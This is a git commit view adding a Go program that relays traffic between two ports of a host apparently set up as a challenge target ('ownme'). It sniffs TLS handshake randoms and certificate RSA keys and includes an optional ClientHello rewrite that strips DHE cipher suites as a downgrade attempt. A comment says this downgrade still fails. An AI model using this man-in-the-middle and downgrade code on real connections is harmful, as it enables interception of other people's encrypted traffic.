summaryrefslogtreecommitdiff
path: root/main.go
diff options
context:
space:
mode:
Diffstat (limited to 'main.go')
-rw-r--r--main.go152
1 files changed, 152 insertions, 0 deletions
diff --git a/main.go b/main.go
new file mode 100644
index 0000000..9f59703
--- /dev/null
+++ b/main.go
@@ -0,0 +1,152 @@
+package main
+
+import (
+ "bytes"
+ "crypto/rsa"
+ "crypto/x509"
+ "encoding/hex"
+ "fmt"
+ "log"
+ "net"
+ "sync"
+)
+
+const (
+ host = `ownme.ipredator.se` // 198.167.222.202
+ clientPort = `:10002`
+ serverPort = `:10000`
+)
+
+type Direction int
+
+const (
+ ServerClient Direction = iota
+ ClientServer
+)
+
+func (d Direction) String() string {
+ switch d {
+ case ServerClient:
+ return "Server → Client"
+ case ClientServer:
+ return "Client → Server"
+ }
+ return "unknown"
+}
+
+type Data struct {
+ Key rsa.PublicKey
+ Rnd []byte
+}
+
+var data = make(map[Direction]Data)
+
+func (dir Direction) sniffCert(b []byte) error {
+ if i := bytes.Index(b, []byte{0x30, 0x82, 0x04, 0x2f}); i > 0 {
+ cert := b[i : i+1075]
+ crt, err := x509.ParseCertificate(cert)
+ if err != nil {
+ return err
+ }
+ d := data[dir]
+ d.Key = *crt.PublicKey.(*rsa.PublicKey)
+ data[dir] = d
+ }
+ return nil
+}
+
+func (dir Direction)sniffRnd(b []byte) error {
+ rnd := b[0x0b:0x2b]
+ fmt.Println(dir, "rnd", len(rnd), "bytes")
+ d := data[dir]
+ d.Rnd = rnd
+ data[dir] = d
+ return nil
+}
+
+// Remove DHE_RSA Chifers in Client Hello
+// altering any value leads to Handshake Failure after Cert Verify ???
+func downgrade(b []byte) int {
+ fmt.Println("downgrade")
+ fmt.Println(hex.Dump(b))
+
+ //b[0x0a] -= 2 // TLS 1.0
+ b[0x04] -= 14 // handshake len
+ b[0x08] -= 14 // hello len
+ b[0x2d] -= 14 // cipher set len
+
+ copy(b[0x2e:], b[0x2e+14:]) // copy second half over first (7 non dhe ciphers)
+ //copy(b[0x2e+14:], b[0x2e+28:]) // preserve fist half (7 dhe ciphers)
+
+ return len(b)-14
+}
+
+var trydowngrade = false
+
+func swapciphers(b []byte) {
+ fmt.Println(hex.Dump(b))
+
+ cipher1 := b[0x2e:0x3c]
+ cipher2 := b[0x3c:0x4a]
+
+ buf := make([]byte, len(b))
+ copy(buf, b)
+ copy(buf[0x2e:], cipher2)
+ copy(buf[0x3c:], cipher1)
+ copy(b, buf)
+}
+
+func (dir Direction) sniff(src, dst net.Conn, wg *sync.WaitGroup) {
+ defer wg.Done()
+ buf := make([]byte, 4096) // 1452
+ k := 1
+ for {
+ n, err := src.Read(buf)
+ if err != nil {
+ dst.Close()
+ return
+ }
+
+ if k == 1 {
+ dir.sniffRnd(buf)
+ if trydowngrade && dir == ClientServer {
+ n = downgrade(buf[:n])
+ //swapciphers(buf[:n])
+ }
+ }
+
+ fmt.Println(k, dir, n, "bytes")
+ fmt.Println(hex.Dump(buf[:n]))
+ k++
+
+ dir.sniffCert(buf[:n])
+
+ _, err = dst.Write(buf[:n])
+ if err != nil {
+ log.Println(dir, err)
+ return
+ }
+ }
+}
+
+func main() {
+ var wg sync.WaitGroup
+
+ srv, err := net.Dial("tcp", host+serverPort)
+ if err != nil {
+ log.Fatal(err)
+ }
+ defer srv.Close()
+
+ cnt, err := net.Dial("tcp", host+clientPort)
+ if err != nil {
+ log.Fatal(err)
+ }
+ defer cnt.Close()
+
+ wg.Add(2)
+ go ServerClient.sniff(srv, cnt, &wg)
+ go ClientServer.sniff(cnt, srv, &wg)
+ wg.Wait()
+// fmt.Println(data)
+}